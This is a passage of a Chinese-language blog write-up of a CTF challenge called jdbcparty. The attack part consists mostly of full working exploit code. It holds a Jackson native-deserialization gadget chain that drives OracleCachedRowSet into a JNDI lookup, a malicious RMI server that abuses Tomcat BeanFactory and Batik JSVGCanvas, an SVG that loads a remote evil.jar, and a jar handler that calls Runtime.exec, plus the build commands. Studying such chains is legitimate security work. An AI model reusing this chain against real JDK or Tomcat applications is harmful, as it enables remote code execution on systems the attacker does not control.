class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.batik.swing.JSVGCanvas;    </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.databind.node.POJONode;    </span><br><span class="line"><span class="keyword">import</span> oracle.jdbc.rowset.OracleCachedRowSet;    </span><br><span class="line"><span class="keyword">import</span> sun.misc.Unsafe;    </span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.users.MemoryUserDatabaseFactory;    </span><br><span class="line"><span class="keyword">import</span> javax.swing.event.EventListenerList;    </span><br><span class="line"><span class="keyword">import</span> javax.swing.undo.UndoManager;    </span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;    </span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;    </span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;    </span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;    </span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Array;    </span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;    </span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;    </span><br><span class="line"><span class="keyword">import</span> java.util.Base64;    </span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;    </span><br><span class="line"><span class="keyword">import</span> java.util.Vector;    </span><br><span class="line">    </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">poc</span> &#123;    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;    </span><br><span class="line">    </span><br><span class="line">        <span class="type">Class</span> <span class="variable">unsafeClass</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.misc.Unsafe&quot;</span>);    </span><br><span class="line">    </span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> unsafeClass.getDeclaredField(<span class="string">&quot;theUnsafe&quot;</span>);    </span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);    </span><br><span class="line">        <span class="type">Unsafe</span> <span class="variable">unsafe</span> <span class="operator">=</span> (Unsafe) field.get(<span class="literal">null</span>);    </span><br><span class="line">        <span class="type">Module</span> <span class="variable">baseModule</span> <span class="operator">=</span> Object.class.getModule();    </span><br><span class="line">        <span class="type">Class</span> <span class="variable">currentClass</span> <span class="operator">=</span> poc.class;    </span><br><span class="line">        <span class="type">long</span> <span class="variable">addr</span> <span class="operator">=</span> unsafe.objectFieldOffset(Class.class.getDeclaredField(<span class="string">&quot;module&quot;</span>));    </span><br><span class="line">        unsafe.getAndSetObject(currentClass, addr, baseModule);    </span><br><span class="line">        <span class="type">OracleCachedRowSet</span> <span class="variable">oracleCachedRowSet</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">OracleCachedRowSet</span>();    </span><br><span class="line">    </span><br><span class="line">        oracleCachedRowSet.setDataSourceName(<span class="string">&quot;rmi://127.0.0.1:1099/Object&quot;</span>);    </span><br><span class="line">    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;monitorLock&quot;</span>),<span class="literal">null</span>);    </span><br><span class="line">        <span class="type">Vector</span> <span class="variable">vector1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Vector</span>();    </span><br><span class="line">        vector1.add(<span class="number">0</span>,<span class="string">&quot;111&quot;</span>);    </span><br><span class="line">        <span class="type">Vector</span> <span class="variable">vector2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Vector</span>();    </span><br><span class="line">        vector2.add(<span class="number">0</span>,<span class="string">&quot;222&quot;</span>);    </span><br><span class="line">        String[] metaData= <span class="keyword">new</span> <span class="title class_">String</span>[]&#123;<span class="string">&quot;111&quot;</span>,<span class="string">&quot;222&quot;</span>&#125;;    </span><br><span class="line">    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;matchColumnIndexes&quot;</span>),vector1);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;matchColumnNames&quot;</span>),vector2);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getDeclaredField(<span class="string">&quot;metaData&quot;</span>),metaData);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getDeclaredField(<span class="string">&quot;reader&quot;</span>),<span class="literal">null</span>);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getDeclaredField(<span class="string">&quot;writer&quot;</span>),<span class="literal">null</span>);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getDeclaredField(<span class="string">&quot;syncProvider&quot;</span>),<span class="literal">null</span>);    </span><br><span class="line">    </span><br><span class="line">        <span class="type">POJONode</span> <span class="variable">pojoNode</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">POJONode</span>(oracleCachedRowSet);    </span><br><span class="line">    </span><br><span class="line">        <span class="type">EventListenerList</span> <span class="variable">list</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">EventListenerList</span>();    </span><br><span class="line">        <span class="type">UndoManager</span> <span class="variable">manager</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UndoManager</span>();    </span><br><span class="line">        <span class="type">Vector</span> <span class="variable">vector</span> <span class="operator">=</span> (Vector) getFieldValue(manager, <span class="string">&quot;edits&quot;</span>);    </span><br><span class="line">        vector.add(pojoNode);    </span><br><span class="line">        setFieldValue(list, <span class="string">&quot;listenerList&quot;</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;InternalError.class, manager&#125;);    </span><br><span class="line">        <span class="type">String</span> <span class="variable">payload</span> <span class="operator">=</span> base64Encode(serialize(list));    </span><br><span class="line">        System.out.println(payload);    </span><br><span class="line">        deserialize(base64Decode(payload));    </span><br><span class="line">    </span><br><span class="line">    &#125;    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Field <span class="title function_">getField</span><span class="params">(<span class="keyword">final</span> Class&lt;?&gt; clazz, <span class="keyword">final</span> String fieldName)</span> &#123;    </span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> <span class="literal">null</span>;    </span><br><span class="line">        <span class="keyword">try</span> &#123;    </span><br><span class="line">            field = clazz.getDeclaredField(fieldName);    </span><br><span class="line">            field.setAccessible(<span class="literal">true</span>);    </span><br><span class="line">        &#125; <span class="keyword">catch</span> (NoSuchFieldException ex) &#123;    </span><br><span class="line">            <span class="keyword">if</span> (clazz.getSuperclass() != <span class="literal">null</span>) &#123;    </span><br><span class="line">                field = getField(clazz.getSuperclass(), fieldName);    </span><br><span class="line">            &#125;    </span><br><span class="line">        &#125;    </span><br><span class="line">        <span class="keyword">return</span> field;    </span><br><span class="line">    &#125;    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">getFieldValue</span><span class="params">(Object obj, String fieldName)</span> <span class="keyword">throws</span> Exception&#123;    </span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> <span class="literal">null</span>;    </span><br><span class="line">        <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> obj.getClass();    </span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; <span class="number">5</span>; i++) &#123;    </span><br><span class="line">            <span class="keyword">try</span> &#123;    </span><br><span class="line">                field = c.getDeclaredField(fieldName);    </span><br><span class="line">            &#125; <span class="keyword">catch</span> (NoSuchFieldException e)&#123;    </span><br><span class="line">                c = c.getSuperclass();    </span><br><span class="line">            &#125;    </span><br><span class="line">        &#125;    </span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);    </span><br><span class="line">        <span class="keyword">return</span> field.get(obj);    </span><br><span class="line">    &#125;    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setFieldValue</span><span class="params">(Object obj, String field, Object val)</span> <span class="keyword">throws</span> Exception&#123;    </span><br><span class="line">        <span class="type">Field</span> <span class="variable">dField</span> <span class="operator">=</span> obj.getClass().getDeclaredField(field);    </span><br><span class="line">        dField.setAccessible(<span class="literal">true</span>);    </span><br><span class="line">        dField.set(obj, val);    </span><br><span class="line">    &#125;    </span><br><span class="line">    <span class="comment">//HashMap打Spring的原生toString链    </span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> HashMap&lt;Object, Object&gt; <span class="title function_">makeMap</span> <span class="params">(Object v1, Object v2 )</span> <span class="keyword">throws</span> Exception &#123;    </span><br><span class="line">        HashMap&lt;Object, Object&gt; s = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();    </span><br><span class="line">        setFieldValue(s, <span class="string">&quot;size&quot;</span>, <span class="number">2</span>);    </span><br><span class="line">        Class&lt;?&gt; nodeC;    </span><br><span class="line">        <span class="keyword">try</span> &#123;    </span><br><span class="line">            nodeC = Class.forName(<span class="string">&quot;java.util.HashMap$Node&quot;</span>);    </span><br><span class="line">        &#125;    </span><br><span class="line">        <span class="keyword">catch</span> ( ClassNotFoundException e ) &#123;    </span><br><span class="line">            nodeC = Class.forName(<span class="string">&quot;java.util.HashMap$Entry&quot;</span>);    </span><br><span class="line">        &#125;    </span><br><span class="line">        Constructor&lt;?&gt; nodeCons = nodeC.getDeclaredConstructor(<span class="type">int</span>.class, Object.class, Object.class, nodeC);    </span><br><span class="line">        nodeCons.setAccessible(<span class="literal">true</span>);    </span><br><span class="line">    </span><br><span class="line">        <span class="type">Object</span> <span class="variable">tbl</span> <span class="operator">=</span> Array.newInstance(nodeC, <span class="number">2</span>);    </span><br><span class="line">        Array.set(tbl, <span class="number">0</span>, nodeCons.newInstance(<span class="number">0</span>, v1, v1, <span class="literal">null</span>));    </span><br><span class="line">        Array.set(tbl, <span class="number">1</span>, nodeCons.newInstance(<span class="number">0</span>, v2, v2, <span class="literal">null</span>));    </span><br><span class="line">        setFieldValue(s, <span class="string">&quot;table&quot;</span>, tbl);    </span><br><span class="line">        <span class="keyword">return</span> s;    </span><br><span class="line">    &#125;    </span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] base64Decode(String base64) &#123;    </span><br><span class="line">        Base64.<span class="type">Decoder</span> <span class="variable">decoder</span> <span class="operator">=</span> Base64.getDecoder();    </span><br><span class="line">        <span class="keyword">return</span> decoder.decode(base64);    </span><br><span class="line">    &#125;    </span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">base64Encode</span><span class="params">(<span class="type">byte</span>[] bytes)</span> &#123;    </span><br><span class="line">        Base64.<span class="type">Encoder</span> <span class="variable">encoder</span> <span class="operator">=</span> Base64.getEncoder();    </span><br><span class="line">        <span class="keyword">return</span> encoder.encodeToString(bytes);    </span><br><span class="line">    &#125;    </span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] serialize(<span class="keyword">final</span> Object obj) <span class="keyword">throws</span> Exception &#123;    </span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">btout</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();    </span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">objOut</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(btout);    </span><br><span class="line">        objOut.writeObject(obj);    </span><br><span class="line">        <span class="keyword">return</span> btout.toByteArray();    </span><br><span class="line">    &#125;    </span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">deserialize</span><span class="params">(<span class="keyword">final</span> <span class="type">byte</span>[] serialized)</span> <span class="keyword">throws</span> Exception &#123;    </span><br><span class="line">        <span class="type">ByteArrayInputStream</span> <span class="variable">btin</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(serialized);    </span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">objIn</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(btin);    </span><br><span class="line">        <span class="keyword">return</span> objIn.readObject();    </span><br><span class="line">    </span><br><span class="line">    &#125;    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.example.jdbcparty;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"><span class="keyword">import</span> sun.misc.Unsafe;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UnSafeTools</span> &#123;</span><br><span class="line">    <span class="keyword">static</span> Unsafe unsafe;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">UnSafeTools</span><span class="params">()</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Unsafe <span class="title function_">getUnsafe</span><span class="params">()</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> Unsafe.class.getDeclaredField(<span class="string">&quot;theUnsafe&quot;</span>);</span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        unsafe = (Unsafe)field.get((Object)<span class="literal">null</span>);</span><br><span class="line">        <span class="keyword">return</span> unsafe;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setObject</span><span class="params">(Object o, Field field, Object value)</span> &#123;</span><br><span class="line">        unsafe.putObject(o, unsafe.objectFieldOffset(field), value);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">newClass</span><span class="params">(Class c)</span> <span class="keyword">throws</span> InstantiationException &#123;</span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> unsafe.allocateInstance(c);</span><br><span class="line">        <span class="keyword">return</span> o;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">bypassModule</span><span class="params">(Class src, Class dst)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Unsafe</span> <span class="variable">unsafe</span> <span class="operator">=</span> getUnsafe();</span><br><span class="line">        <span class="type">Method</span> <span class="variable">getModule</span> <span class="operator">=</span> dst.getDeclaredMethod(<span class="string">&quot;getModule&quot;</span>);</span><br><span class="line">        getModule.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">module</span> <span class="operator">=</span> getModule.invoke(dst);</span><br><span class="line">        <span class="type">long</span> <span class="variable">addr</span> <span class="operator">=</span> unsafe.objectFieldOffset(Class.class.getDeclaredField(<span class="string">&quot;module&quot;</span>));</span><br><span class="line">        unsafe.getAndSetObject(src, addr, <span class="keyword">module</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> Unsafe.class.getDeclaredField(<span class="string">&quot;theUnsafe&quot;</span>);</span><br><span class="line">            field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">            unsafe = (Unsafe)field.get((Object)<span class="literal">null</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception var1) &#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;Error: &quot;</span> + var1);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里是用的jackson原生的反序列化来打的然后入口是EventListenerList去触发toString然后利用jackson反序列化会调用getter的特性触发getconnection方法调用lookup方法。</p>
<img src="/post/undefined/IMAGE20250221213224950.png" class="">

<img src="/post/undefined/IMAGE20250221213242950.png" class="">

<p>然后在poc上面的一部分做一下解释</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;matchColumnIndexes&quot;</span>),vector1);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;matchColumnNames&quot;</span>),vector2);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getDeclaredField(<span class="string">&quot;metaData&quot;</span>),metaData);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getDeclaredField(<span class="string">&quot;reader&quot;</span>),<span class="literal">null</span>);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getDeclaredField(<span class="string">&quot;writer&quot;</span>),<span class="literal">null</span>);    </span><br><span class="line">        UnSafeTools.setObject(oracleCachedRowSet,oracleCachedRowSet.getClass().getDeclaredField(<span class="string">&quot;syncProvider&quot;</span>),<span class="literal">null</span>); </span><br></pre></td></tr></table></figure>

<p>这里是连接时需要设置的参数，否则就会报错。然后其实到这里就已经可以发起外部请求了，但是因为时jdk17，所以需要绕过jndi不能远程加载的问题，之前浅蓝师傅的一篇<a target="_blank" rel="noopener" href="https://tttang.com/archive/1405/#toc_tomcat-jdbc">文章</a>介绍了很多种高版本绕过jdk的手法可以去寻找看看,不过发现好像文章中介绍的在此题中版本不一样没法利用。</p>
<p> tomcat高版本 虽然对<code>toString</code>做了限制但是可以通过<code>JavaBeans Introspector</code> 实现获取任意类的bean之后就可以调用任意类的的setter方法 而且可以实现<strong>任意传参</strong>所以我们可以通过 <code>BeanFactory</code>实现<strong>调用任意setter方法并且传参</strong>获取JavaBean的<code>WriteMethod</code>也就是所有<code>setter</code>方法<br> <a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/16156">https://xz.aliyun.com/news/16156</a></p>
<p>这里利用的是<code>org.apache.batik.swing.JSVGCanvas.setURI</code>并且lib中存在依赖。具体原理参考：<br><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/fZtDvpyAo-UZRE9MhfB0VQ">https://mp.weixin.qq.com/s/fZtDvpyAo-UZRE9MhfB0VQ</a><br><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/l5e2p_WtYSCYYhYE0lzRdQ">https://mp.weixin.qq.com/s/l5e2p_WtYSCYYhYE0lzRdQ</a><br>然后结合一个20年前的漏洞 svg打rce<br><a target="_blank" rel="noopener" href="https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html">https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html</a></p>
<p>记录下payload</p>
<p>svg</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://www.w3.org/2000/svg&quot;</span> <span class="attr">width</span>=<span class="string">&quot;100&quot;</span> <span class="attr">height</span>=<span class="string">&quot;100&quot;</span> <span class="attr">xmlns:xlink</span>=<span class="string">&quot;http://www.w3.org/1999/xlink&quot;</span>&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;application/java-archive&quot;</span> <span class="attr">xlink:href</span>=<span class="string">&quot;http://127.0.0.1:81/evil.jar&quot;</span>&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;/<span class="name">svg</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>RMIserver</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.jndi.rmi.registry.ReferenceWrapper;    </span><br><span class="line"><span class="keyword">import</span> org.apache.naming.ResourceRef;    </span><br><span class="line">    </span><br><span class="line"><span class="keyword">import</span> javax.naming.NamingException;    </span><br><span class="line"><span class="keyword">import</span> javax.naming.StringRefAddr;    </span><br><span class="line"><span class="keyword">import</span> java.rmi.AlreadyBoundException;    </span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;    </span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;    </span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;    </span><br><span class="line">    </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">RMIServer</span> &#123;    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> RemoteException, NamingException, AlreadyBoundException &#123;    </span><br><span class="line">        <span class="type">Registry</span> <span class="variable">registry</span> <span class="operator">=</span> LocateRegistry.createRegistry( <span class="number">1099</span>);    </span><br><span class="line">    </span><br><span class="line">        <span class="type">ResourceRef</span> <span class="variable">ref</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ResourceRef</span>(<span class="string">&quot;org.apache.batik.swing.JSVGCanvas&quot;</span>, <span class="literal">null</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>,    </span><br><span class="line">                <span class="literal">true</span>,<span class="string">&quot;org.apache.naming.factory.BeanFactory&quot;</span>,<span class="literal">null</span>);    </span><br><span class="line">    </span><br><span class="line">        ref.add(<span class="keyword">new</span> <span class="title class_">StringRefAddr</span>(<span class="string">&quot;forceString&quot;</span>, <span class="string">&quot;URI=test&quot;</span>));    </span><br><span class="line">    </span><br><span class="line">        ref.add(<span class="keyword">new</span> <span class="title class_">StringRefAddr</span>(<span class="string">&quot;URI&quot;</span>, <span class="string">&quot;http://127.0.0.1:7001/calc.svg&quot;</span>));    </span><br><span class="line">        <span class="type">ReferenceWrapper</span> <span class="variable">referenceWrapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ReferenceWrapper</span>(ref);    </span><br><span class="line">        registry.bind(<span class="string">&quot;Object&quot;</span>, referenceWrapper);    </span><br><span class="line">    &#125;    </span><br><span class="line">    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.w3c.dom.svg.EventListenerInitializer;    </span><br><span class="line"><span class="keyword">import</span> org.w3c.dom.svg.SVGDocument;    </span><br><span class="line">    </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">SVGHandler</span> <span class="keyword">implements</span> <span class="title class_">EventListenerInitializer</span> &#123;    </span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">SVGHandler</span><span class="params">()</span> &#123;&#125;    </span><br><span class="line">    <span class="meta">@Override</span>    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">initializeEventListeners</span><span class="params">(SVGDocument svgDocument)</span> &#123;    </span><br><span class="line">        <span class="keyword">try</span>&#123;    </span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;open -a Calculator&quot;</span>);    </span><br><span class="line">        &#125;<span class="keyword">catch</span>(Exception e)&#123;    </span><br><span class="line">    </span><br><span class="line">        &#125;    </span><br><span class="line">    &#125;    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<p>这里需要实现EventListenerInitializer接口的原因在于svg在进行加载jar文件的时候进行了强转</p>
<img src="/post/undefined/IMAGE20250221214715766.png" class="">

<p>下面将该java文件编译成jar，先导入依赖</p>
<img src="/post/undefined/IMAGE20250221214745645.png" class="">

<p>然后编写<br>META-INF&#x2F;MANIFEST.MF</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Manifest-Version: <span class="number">1.0</span>    </span><br><span class="line">SVG-Handler-Class: SVGHandler</span><br></pre></td></tr></table></figure>
<img src="/post/undefined/IMAGE20250221214839470.png" class="">
<p>最后编译</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac -cp /Users/ocean/Downloads/xml-apis-ext-1.3.04.jar SVGHandler.java</span><br><span class="line">jar cmf /Users/ocean/Cybersecurity/Java_project/svg_rce/src/main/resources/META-INF/MANIFEST.MF evil.jar SVGHandler.class</span><br></pre></td></tr></table></figure>

<p>然后将svg 和 evil.jar分别放在不同的端口服务上就可以打成功了</p>
<img src="/post/undefined/IMAGE20250221215035253.png" class="">

<p>参考：<br><a target="_blank" rel="noopener" href="https://nlrvana.github.io/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4%E8%B5%9B-jdbcparty/#0x02-jdk%E9%AB%98%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87jndi">https://nlrvana.github.io/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4%E8%B5%9B-jdbcparty/#0x02-jdk%E9%AB%98%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87jndi</a><br><a target="_blank" rel="noopener" href="https://j1rry-learn.github.io/posts/%E4%BB%8E%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4%E8%B5%9Bjdbcparty-%E5%AD%A6%E4%B9%A0%E9%AB%98%E7%89%88%E6%9C%ACjdk%E5%92%8C%E9%AB%98%E7%89%88%E6%9C%ACtomcat%E6%89%93jndi%E5%88%B0rce">https://j1rry-learn.github.io/posts/%E4%BB%8E%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4%E8%B5%9Bjdbcparty-%E5%AD%A6%E4%B9%A0%E9%AB%98%E7%89%88%E6%9C%ACjdk%E5%92%8C%E9%AB%98%E7%89%88%E6%9C%ACtomcat%E6%89%93jndi%E5%88%B0rce</a></p>

  </div>
</article>

    <div class="blog-post-comments">
